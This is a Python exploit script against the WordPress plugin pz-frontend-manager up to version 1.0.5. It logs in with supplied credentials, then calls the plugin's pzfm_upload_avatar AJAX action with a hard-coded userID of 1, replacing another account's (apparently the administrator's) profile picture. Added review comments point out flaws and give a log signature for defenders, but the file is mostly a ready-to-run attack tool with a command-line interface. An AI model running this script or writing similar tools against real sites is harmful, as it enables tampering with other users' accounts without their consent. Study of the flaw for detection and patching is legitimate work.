import argparse
import requests
import base64
import os
import re
import json

#by Nxploit | Khaled_alenazi

# Silences urllib3's InsecureRequestWarning. Most requests below pass
# verify=False, i.e. TLS certificate validation is switched off, so the
# script will happily talk to a host presenting any certificate.
requests.packages.urllib3.disable_warnings()


def check_version(url: str) -> bool:
    """Fetch the plugin's public readme.txt and inspect its "Stable tag".

    Args:
        url: Base URL of the WordPress site. It is concatenated directly
            with the plugin path, so it is expected without a trailing slash.

    Returns:
        True when the readme is reachable (HTTP 200) and the parsed tag
        compares as <= '1.0.5'; False on any other status, when no tag is
        found, or when the tag compares as newer.
    """
    check_url = f"{url}/wp-content/plugins/pz-frontend-manager/readme.txt"
    # Certificate verification disabled for this request (see module top).
    response = requests.get(check_url, verify=False)
    if response.status_code == 200:
        match = re.search(r"Stable tag:\s*([0-9.]+)", response.text)
        if match:
            version = match.group(1)
            # NOTE(review): this is a plain str comparison, so it is
            # lexicographic rather than numeric. A tag such as '1.0.10'
            # compares lower than '1.0.5' and would be reported as affected;
            # a tuple-of-ints comparison is the correct form of this check.
            if version <= '1.0.5':
                print(f"The site is vulnerable! Detected version: {version}")
                return True
            else:
                print(f"The site is not vulnerable. Detected version: {version}")
                return False
    # Reached on a non-200 status or when no "Stable tag" line matched.
    # An unreachable readme is therefore reported the same way as "not
    # vulnerable" — the caller cannot distinguish "unknown" from "safe".
    print("Failed to determine the plugin version.")
    return False


def encode_image(image_path: str) -> str:
    """Read image_path and return it as a base64 `data:` URI string.

    Args:
        image_path: Filesystem path of the image to encode.

    Returns:
        A str of the form 'data:image/png;base64,<payload>'. The MIME label
        is hard-coded to image/png regardless of the file's real format,
        although the CLI default below is a '.jpg' file name.

    Terminates the process when the file does not exist.
    """
    if not os.path.exists(image_path):
        print(f"Error: Image file '{image_path}' not found!")
        # NOTE(review): `exit()` is the site-module convenience, not
        # sys.exit(); it is unavailable under `python -S` and callers
        # cannot intercept it as a return value.
        exit()
    with open(image_path, "rb") as image_file:
        encoded_string = base64.b64encode(image_file.read()).decode("utf-8")
    return f"data:image/png;base64,{encoded_string}"


def perform_exploit(url: str, username: str, password: str, image_data: str) -> None:
    """Authenticate to WordPress and submit image_data via the plugin's AJAX action.

    Steps, as written: (1) POST the login form to wp-login.php, (2) accept
    the login only if a cookie whose name contains 'wordpress_logged_in'
    was set, (3) POST to wp-admin/admin-ajax.php with
    action=pzfm_upload_avatar, the encoded image, and a fixed userID of 1,
    (4) print the raw response and, when it is JSON with a 'url' key, that
    URL.

    Note the CLI description labels this "CSRF", but this function
    authenticates with the supplied credentials and issues the request
    itself.

    Args:
        url: Base URL of the WordPress site (no trailing slash).
        username: Account name sent in the login form's 'log' field.
        password: Account password sent in the 'pwd' field.
        image_data: The `data:` URI produced by encode_image().

    Terminates the process when the login check fails.
    """
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0"
    session = requests.Session()
    login_url = f"{url}/wp-login.php"
    # Standard wp-login.php form fields; verify=False again disables TLS
    # certificate validation for this request.
    response = session.post(login_url, verify=False, data={
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }, headers={"User-Agent": user_agent})
    # Login success is inferred solely from the presence of a
    # 'wordpress_logged_in*' cookie in the jar; the login response body
    # and status code are not examined.
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Logged in successfully.")
    else:
        print("Failed to log in.")
        exit()
    # Only the first 100 characters of the payload are echoed.
    print("Base64 Encoded Image Data:")
    print(image_data[:100] + "...")
    post_url = f"{url}/wp-admin/admin-ajax.php"
    headers = {
        "User-Agent": user_agent,
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": url,
        # NOTE(review): the Cookie header is rebuilt by hand from the same
        # jar the Session already holds, so this duplicates what the Session
        # would send; presumably the explicit header is the one that ends up
        # on the wire — verify against requests' header merging if it matters.
        "Cookie": "; ".join([f"{cookie.name}={cookie.value}" for cookie in session.cookies]),
        "Connection": "close"
    }
    # The request names user 1 explicitly rather than the authenticated
    # account. For defenders: an admin-ajax.php POST carrying
    # action=pzfm_upload_avatar together with a client-supplied userID is
    # the identifying request to look for in web-server or WAF logs.
    data = {
        'action': 'pzfm_upload_avatar',
        'imageData': image_data,
        'userID': 1
    }
    # Unlike the other requests in this file, this call does not pass
    # verify=False, so the Session's default certificate verification
    # applies here — the behaviour is inconsistent across the two calls.
    response = session.post(post_url, headers=headers, data=data)
    print("Request result:", response.text)
    try:
        response_json = json.loads(response.text)
        if 'url' in response_json:
            image_url = response_json['url']
            print(f"Image URL: {image_url}")
        else:
            print("No URL found in the response.")
    except json.JSONDecodeError:
        print("Failed to decode JSON response.")


if __name__ == "__main__":
    # CLI: the description string is the only place the affected version
    # range is stated in prose; the actual threshold is the str comparison
    # inside check_version().
    parser = argparse.ArgumentParser(description='pz-frontend-manager <= 1.0.5 - CSRF change user profile picture')
    parser.add_argument('--url', '-u', type=str, required=True, help='Base URL of the WordPress site')
    parser.add_argument('--username', '-U', type=str, required=True, help='Username for login')
    # NOTE(review): the password is taken from argv, so it lands in shell
    # history and is visible in the process list for the run's duration.
    parser.add_argument('--password', '-p', type=str, required=True, help='Password for login')
    parser.add_argument('--image', '-i', type=str, default='Nxploit.jpg', help='Image file name (default: Nxploit.jpg)')
    args = parser.parse_args()
    # The image is resolved relative to the script's own directory, not the
    # current working directory; an absolute --image path survives
    # os.path.join unchanged.
    script_dir = os.path.dirname(os.path.abspath(__file__))
    image_path = os.path.join(script_dir, args.image)
    # The upload step runs only when the readme check reports the site as
    # affected; a fetch failure in check_version() also stops here.
    if check_version(args.url):
        image_data = encode_image(image_path)
        perform_exploit(args.url, args.username, args.password, image_data)